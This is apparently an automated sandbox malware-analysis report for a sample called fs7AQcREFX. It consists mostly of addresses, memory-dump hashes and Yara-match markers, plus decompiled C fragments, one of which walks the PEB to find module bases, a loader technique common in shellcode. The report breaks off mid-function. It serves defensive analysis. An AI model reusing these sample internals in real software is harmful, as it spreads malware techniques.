                                                                                                                                                                                                                                                                                          0x00104748
                                                                                                                                                                                                                                                                                          0x0010474f
                                                                                                                                                                                                                                                                                          0x00104756
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00104756
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00104758
                                                                                                                                                                                                                                                                                          0x00104758
                                                                                                                                                                                                                                                                                          0x0010475c
                                                                                                                                                                                                                                                                                          0x00104760
                                                                                                                                                                                                                                                                                          0x00104761
                                                                                                                                                                                                                                                                                          0x00104764
                                                                                                                                                                                                                                                                                          0x00104768
                                                                                                                                                                                                                                                                                          0x0010476a
                                                                                                                                                                                                                                                                                          0x0010476d
                                                                                                                                                                                                                                                                                          0x00104773
                                                                                                                                                                                                                                                                                          0x00104778
                                                                                                                                                                                                                                                                                          0x00104780
                                                                                                                                                                                                                                                                                          0x00104784
                                                                                                                                                                                                                                                                                          0x00104787
                                                                                                                                                                                                                                                                                          0x00104789
                                                                                                                                                                                                                                                                                          0x00104790
                                                                                                                                                                                                                                                                                          0x00104790
                                                                                                                                                                                                                                                                                          0x00104792
                                                                                                                                                                                                                                                                                          0x00104792
                                                                                                                                                                                                                                                                                          0x00104797
                                                                                                                                                                                                                                                                                          0x00104799
                                                                                                                                                                                                                                                                                          0x0010479c
                                                                                                                                                                                                                                                                                          0x0010479f
                                                                                                                                                                                                                                                                                          0x001047a2
                                                                                                                                                                                                                                                                                          0x001047a5
                                                                                                                                                                                                                                                                                          0x001047a8
                                                                                                                                                                                                                                                                                          0x001047aa
                                                                                                                                                                                                                                                                                          0x001047ad
                                                                                                                                                                                                                                                                                          0x001047ad
                                                                                                                                                                                                                                                                                          0x001047b7
                                                                                                                                                                                                                                                                                          0x001047b9
                                                                                                                                                                                                                                                                                          0x001047bc
                                                                                                                                                                                                                                                                                          0x00104790
                                                                                                                                                                                                                                                                                          0x001047c0
                                                                                                                                                                                                                                                                                          0x001047c1
                                                                                                                                                                                                                                                                                          0x001047c4
                                                                                                                                                                                                                                                                                          0x001047c7
                                                                                                                                                                                                                                                                                          0x00104780
                                                                                                                                                                                                                                                                                          0x001047d6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001046d1
                                                                                                                                                                                                                                                                                          0x0010466f
                                                                                                                                                                                                                                                                                          0x00104677
                                                                                                                                                                                                                                                                                          0x00104677

                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: l.dl$ntdl
                                                                                                                                                                                                                                                                                          • API String ID: 0-1236859653
                                                                                                                                                                                                                                                                                          • Opcode ID: 10a2e666df32bee08ebb0337b06e40436b750ff831d9746c9c651f880d8da755
                                                                                                                                                                                                                                                                                          • Instruction ID: 0cdab877ef7beb653ca05f4bd6016ac45fc738f767914e79dde08750820aa5fd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10a2e666df32bee08ebb0337b06e40436b750ff831d9746c9c651f880d8da755
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA51C7B6E012148FCB24CF59D4D0679B7F2FF89310B1A82AED9459B761D771AD41CB80
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                          			E000F15C0(void* __ecx, intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                          				void* _t5;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t10;
                                                                                                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t18;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t19;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t10 = _a4;
                                                                                                                                                                                                                                                                                          				if(_t10 != 0) {
                                                                                                                                                                                                                                                                                          					_t15 = 0;
                                                                                                                                                                                                                                                                                          					_t18 = __ecx + 0x28;
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
                                                                                                                                                                                                                                                                                          						L4:
                                                                                                                                                                                                                                                                                          						 *_t10 =  *_t18;
                                                                                                                                                                                                                                                                                          						_t19 =  *_t18;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)( *((intOrPtr*)( *_t19 + 4))))(_t19);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__imp__CoCreateInstance(0x1104d8, 0, 1, 0x112e4c, _t18);
                                                                                                                                                                                                                                                                                          						_t15 = _t5;
                                                                                                                                                                                                                                                                                          						if(_t15 >= 0) {
                                                                                                                                                                                                                                                                                          							goto L4;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return _t15;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return 0x80004003;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x000f15c4
                                                                                                                                                                                                                                                                                          0x000f15c9
                                                                                                                                                                                                                                                                                          0x000f15d7
                                                                                                                                                                                                                                                                                          0x000f15dc
                                                                                                                                                                                                                                                                                          0x000f15df
                                                                                                                                                                                                                                                                                          0x000f15fb
                                                                                                                                                                                                                                                                                          0x000f15fd
                                                                                                                                                                                                                                                                                          0x000f15ff
                                                                                                                                                                                                                                                                                          0x000f1607
                                                                                                                                                                                                                                                                                          0x000f15e1
                                                                                                                                                                                                                                                                                          0x000f15ef
                                                                                                                                                                                                                                                                                          0x000f15f5
                                                                                                                                                                                                                                                                                          0x000f15f9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f15f9
                                                                                                                                                                                                                                                                                          0x000f160f
                                                                                                                                                                                                                                                                                          0x000f15cb
                                                                                                                                                                                                                                                                                          0x000f15d2
                                                                                                                                                                                                                                                                                          0x000f15d2

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(001104D8,00000000,00000001,00112E4C,?), ref: 000F15EF
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 542301482-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 13c03de762c6399045a8f71436ab3c701de49de8d2295ba5e4c5924bdab58fe5
                                                                                                                                                                                                                                                                                          • Instruction ID: 28f722b2caaf7c31195853fd5311463bace225c1b24e37e0cccefe151dadb4e6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13c03de762c6399045a8f71436ab3c701de49de8d2295ba5e4c5924bdab58fe5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8F05476200214EBD7219E4AAC80D97BBE9EBDD7747204029FB4C97600DA729852D7A0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E00109CD1() {
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				SetUnhandledExceptionFilter(E00109C8F);
                                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                                          			}



                                                                                                                                                                                                                                                                                          0x00109cd6
                                                                                                                                                                                                                                                                                          0x00109cde

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00019C8F), ref: 00109CD6
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 204d150791376941cdad82269f27fbff636ace5ec89eff201a705d5b17bac816
                                                                                                                                                                                                                                                                                          • Instruction ID: 938a00bab1f167e1fdcb157b387db104059ecd0f73a8fb227c373fab848caa20
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 204d150791376941cdad82269f27fbff636ace5ec89eff201a705d5b17bac816
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70900270A5114056D65617B15E1D45625D06B8C716B424454B055C84A5EBE480805551
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                                                                                                                                                          • Instruction ID: aea7f6c118c6da8dca1f4ea0f35786fc9a1d3b190066b99fbb8e021fd6772697
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70F1F8B4A02219EFDB04CF94C990AAEBBB1FF89304F208558E905AB3C1D735EA45CB54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                                                                                                                                                                                                                                          • Instruction ID: b6352a4ced422daaa9e6bc2778c319a1c24e6954e7fa2d30325796f51715002d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD31F536A0531A8FC710DF18C480A2AB7E5FF9A308F4549ADE595873D2D330F90ACB95
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 2e3825faf63fa0ff6435f59ea36599fc7611a0e4e53b97de03523db55ee4051b
                                                                                                                                                                                                                                                                                          • Instruction ID: 333eea5dee2e343bb00c341eb8fe06bf37e762eeefd5c7ced5dcbfcb5df87b3b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e3825faf63fa0ff6435f59ea36599fc7611a0e4e53b97de03523db55ee4051b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DF0B42106C7C69ADBA6DF38C4A40C3FFE1AF4F31038A65CCC8C00D413C2109495D781
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                                                                                                                          • Instruction ID: 88215b3929851b503fb9e0336a359976704c6dde636ba1c8479b7b66991880c0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25C04C36221850CFC781CF18E444E81B3E4FB09631B068491E805DB721D234EC41CA40
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                                                                                                                          • Instruction ID: 88215b3929851b503fb9e0336a359976704c6dde636ba1c8479b7b66991880c0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25C04C36221850CFC781CF18E444E81B3E4FB09631B068491E805DB721D234EC41CA40
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                          			E04003090() {
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				asm("lodsd");
                                                                                                                                                                                                                                                                                          				return  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 8));
                                                                                                                                                                                                                                                                                          			}



                                                                                                                                                                                                                                                                                          0x0400309f
                                                                                                                                                                                                                                                                                          0x040030a4

                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                                                                                                                          • Instruction ID: 88215b3929851b503fb9e0336a359976704c6dde636ba1c8479b7b66991880c0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25C04C36221850CFC781CF18E444E81B3E4FB09631B068491E805DB721D234EC41CA40
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                                                                                                          			E00103960(struct HBRUSH__* __ecx, struct HDC__* __edx, struct HDC__** _a4, int _a8, int _a12, int _a16, int _a20, struct HDC__* _a24, void* _a28) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                                          				int _v36;
                                                                                                                                                                                                                                                                                          				int _v40;
                                                                                                                                                                                                                                                                                          				int _v44;
                                                                                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                                                                                          				int _v52;
                                                                                                                                                                                                                                                                                          				int _v56;
                                                                                                                                                                                                                                                                                          				struct tagBITMAPINFO _v60;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v76;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v80;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v84;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v88;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v92;
                                                                                                                                                                                                                                                                                          				struct HDC__** _v96;
                                                                                                                                                                                                                                                                                          				void* _v100;
                                                                                                                                                                                                                                                                                          				struct HBITMAP__* _v104;
                                                                                                                                                                                                                                                                                          				struct HBITMAP__* _v108;
                                                                                                                                                                                                                                                                                          				void* _v112;
                                                                                                                                                                                                                                                                                          				void* _v116;
                                                                                                                                                                                                                                                                                          				void* _v120;
                                                                                                                                                                                                                                                                                          				void* _v124;
                                                                                                                                                                                                                                                                                          				void* _v128;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _v132;
                                                                                                                                                                                                                                                                                          				void* _v136;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t90;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t92;
                                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                                          				void* _t119;
                                                                                                                                                                                                                                                                                          				void* _t120;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t121;
                                                                                                                                                                                                                                                                                          				int _t141;
                                                                                                                                                                                                                                                                                          				int _t155;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t156;
                                                                                                                                                                                                                                                                                          				long _t178;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _t194;
                                                                                                                                                                                                                                                                                          				struct HDC__** _t201;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t202;
                                                                                                                                                                                                                                                                                          				struct HDC__** _t203;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t204;
                                                                                                                                                                                                                                                                                          				void* _t205;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t206;
                                                                                                                                                                                                                                                                                          				void* _t207;
                                                                                                                                                                                                                                                                                          				signed int _t208;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t184 = __edx;
                                                                                                                                                                                                                                                                                          				_t90 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v12 = _t90 ^ _t208;
                                                                                                                                                                                                                                                                                          				_t92 = _a24;
                                                                                                                                                                                                                                                                                          				_t155 = _a20;
                                                                                                                                                                                                                                                                                          				_t201 = _a4;
                                                                                                                                                                                                                                                                                          				_v132 = __ecx;
                                                                                                                                                                                                                                                                                          				_v96 = _t201;
                                                                                                                                                                                                                                                                                          				_v92 = _t92;
                                                                                                                                                                                                                                                                                          				_v100 = __edx;
                                                                                                                                                                                                                                                                                          				_v120 = _a28;
                                                                                                                                                                                                                                                                                          				if(_t92 == 0) {
                                                                                                                                                                                                                                                                                          					_t184 =  *_t201;
                                                                                                                                                                                                                                                                                          					_t92 = CreateCompatibleDC( *_t201);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v80 = _t92;
                                                                                                                                                                                                                                                                                          				if(_t92 == 0) {
                                                                                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                                                                                          					return E001059E6(0, _t155, _v12 ^ _t208, _t184, _t201, _t206);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t206 = CreateCompatibleDC( *_t201);
                                                                                                                                                                                                                                                                                          					_v88 = _t206;
                                                                                                                                                                                                                                                                                          					if(_t206 != 0) {
                                                                                                                                                                                                                                                                                          						_v56 = _a16;
                                                                                                                                                                                                                                                                                          						_t186 =  &_v60;
                                                                                                                                                                                                                                                                                          						_v60.bmiHeader = 0x28;
                                                                                                                                                                                                                                                                                          						_v52 = _t155;
                                                                                                                                                                                                                                                                                          						_v48 = 0x10001;
                                                                                                                                                                                                                                                                                          						_v44 = 0;
                                                                                                                                                                                                                                                                                          						_v40 = 0;
                                                                                                                                                                                                                                                                                          						_v36 = 0;
                                                                                                                                                                                                                                                                                          						_v32 = 0;
                                                                                                                                                                                                                                                                                          						_v28 = 0;
                                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                                          						_v60.bmiColors = 0;
                                                                                                                                                                                                                                                                                          						_v16 = 0xffffff;
                                                                                                                                                                                                                                                                                          						_t98 = CreateDIBSection(_t206,  &_v60, 0,  &_v136, 0, 0);
                                                                                                                                                                                                                                                                                          						_v116 = _t98;
                                                                                                                                                                                                                                                                                          						if(_t98 != 0) {
                                                                                                                                                                                                                                                                                          							_t207 = SelectObject;
                                                                                                                                                                                                                                                                                          							_v124 = SelectObject(_t206, _t98);
                                                                                                                                                                                                                                                                                          							_t202 = CreateCompatibleDC( *_t201);
                                                                                                                                                                                                                                                                                          							_v84 = CreateCompatibleDC( *_v96);
                                                                                                                                                                                                                                                                                          							_v104 = CreateCompatibleBitmap(_v80, _a16, _t155);
                                                                                                                                                                                                                                                                                          							_v108 = CreateBitmap(_a16, _t155, 1, 1, 0);
                                                                                                                                                                                                                                                                                          							_v128 = SelectObject(_t202, _v104);
                                                                                                                                                                                                                                                                                          							_v112 = SelectObject(_v84, _v108);
                                                                                                                                                                                                                                                                                          							BitBlt(_t202, 0, 0, _a16, _t155, _v80, 0, 0, 0xcc0020);
                                                                                                                                                                                                                                                                                          							SetBkColor(_t202, 0x808080);
                                                                                                                                                                                                                                                                                          							BitBlt(_v84, 0, 0, _a16, _t155, _t202, 0, 0, 0xcc0020);
                                                                                                                                                                                                                                                                                          							BitBlt(_t202, 0, 0, _a16, _t155, _v84, 0, 0, 0x660046);
                                                                                                                                                                                                                                                                                          							BitBlt(_v88, 0, 0, _a16, _t155, _t202, 0, 0, 0xcc0020);
                                                                                                                                                                                                                                                                                          							SelectObject(_t202, _v128);
                                                                                                                                                                                                                                                                                          							SelectObject(_v84, _v112);
                                                                                                                                                                                                                                                                                          							_t119 = _v108;
                                                                                                                                                                                                                                                                                          							if(_t119 != 0) {
                                                                                                                                                                                                                                                                                          								DeleteObject(_t119);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t120 = _v104;
                                                                                                                                                                                                                                                                                          							if(_t120 != 0) {
                                                                                                                                                                                                                                                                                          								DeleteObject(_t120);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t121 = _v84;
                                                                                                                                                                                                                                                                                          							if(_t121 != 0) {
                                                                                                                                                                                                                                                                                          								DeleteDC(_t121);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							if(_t202 != 0) {
                                                                                                                                                                                                                                                                                          								DeleteDC(_t202);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t194 = _v132;
                                                                                                                                                                                                                                                                                          							_t203 = _v96;
                                                                                                                                                                                                                                                                                          							if(_t194 != 0) {
                                                                                                                                                                                                                                                                                          								_t141 = _a12;
                                                                                                                                                                                                                                                                                          								_t178 = _a8;
